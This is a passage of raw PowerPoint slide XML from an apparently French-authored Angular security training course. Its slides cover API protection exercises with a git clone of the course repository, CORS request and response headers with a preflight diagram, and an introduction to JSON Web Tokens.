              <a:rPr lang="fr-FR" sz="1050" dirty="0"/>
              <a:t>ng2Shiro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1" smtClean="0"/>
              <a:t>sdco-angular-shiro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" smtClean="0"/>
              <a:t>, …</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40388942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915566"/>
            <a:ext cx="8856984" cy="3024336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– API-Protection (1/2)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Installation : </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" err="1"/>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t> clone -b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>PW-JWT-OAuth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0"/>
              <a:t>https://gitlab.kazan.priv.atos.fr/trainingangular2/secure-angular-training-app.git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Exercises</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t>	Follow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>practical_works</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>/PW-API-Protection_part_1.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26884551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marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Cross-origin resource sharing (CORS) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Allows restricted resources on a web page to be requested from another domain outside the domain from which the first resource was served</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="204550"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>	      	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>API Protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Tableau 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2806754779"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="539553" y="1995686"/>
          <a:ext cx="8496943" cy="2937450"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3912096"/>
                <a:gridCol w="4584847"/>
              </a:tblGrid>
              <a:tr h="2856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Request headers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Response headers</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="2378606">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="200000"/>
                        </a:lnSpc>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buChar char="q"/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Origin</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="200000"/>
                        </a:lnSpc>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buChar char="q"/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Access-Control-Request-Method</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="200000"/>
                        </a:lnSpc>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buChar char="q"/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Access-Control-Request-Headers</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="200000"/>
                        </a:lnSpc>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buChar char="q"/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Access-Control-Allow-Origin</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="200000"/>
                        </a:lnSpc>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buChar char="q"/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Access-Control-Allow-Credentials</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="200000"/>
                        </a:lnSpc>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buChar char="q"/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Access-Control-Expose-Headers</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="200000"/>
                        </a:lnSpc>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buChar char="q"/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Access-Control-Max-Age</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="200000"/>
                        </a:lnSpc>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buChar char="q"/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Access-Control-Allow-Methods</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="200000"/>
                        </a:lnSpc>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buChar char="q"/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Access-Control-Allow-Headers</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9065596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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="204550"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>	      	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>API Protection</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07504" y="915566"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>CORS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="ZoneTexte 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051720" y="4943445"/>
            <a:ext cx="4387740" cy="200055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>https://commons.wikimedia.org/wiki/File:Flowchart_showing_Simple_and_Preflight_XHR.svg</a:t>
            </a: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75" y="847725"/>
            <a:ext cx="7181850"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ZoneTexte 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="4284691"/>
            <a:ext cx="5511445" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t>http://docs.aws.amazon.com/sdk-for-javascript/v2/developer-guide/cors.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23970683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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="204550"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>	      	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>API Protection</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07504" y="915566"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>CORS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>preflight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="ZoneTexte 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3131840" y="4266197"/>
            <a:ext cx="3055645" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>https://crazygui.files.wordpress.com/2012/08/cors.png</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 6" descr="https://upload.wikimedia.org/wikipedia/commons/thumb/c/ca/Flowchart_showing_Simple_and_Preflight_XHR.svg/1280px-Flowchart_showing_Simple_and_Preflight_XHR.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699542"/>
            <a:ext cx="8190366" cy="429994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3227374" y="4876006"/>
            <a:ext cx="3720890" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>https://en.wikipedia.org/wiki/Cross-origin_resource_sharing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6915691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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="771550"/>
            <a:ext cx="9001000" cy="3672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Overview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="900" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>JSON Web Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(JWT) is an open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>RFC 7519</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>) that defines a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>compact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>self-contained </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>way for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>securely transmitting information between parties </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>JSON object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
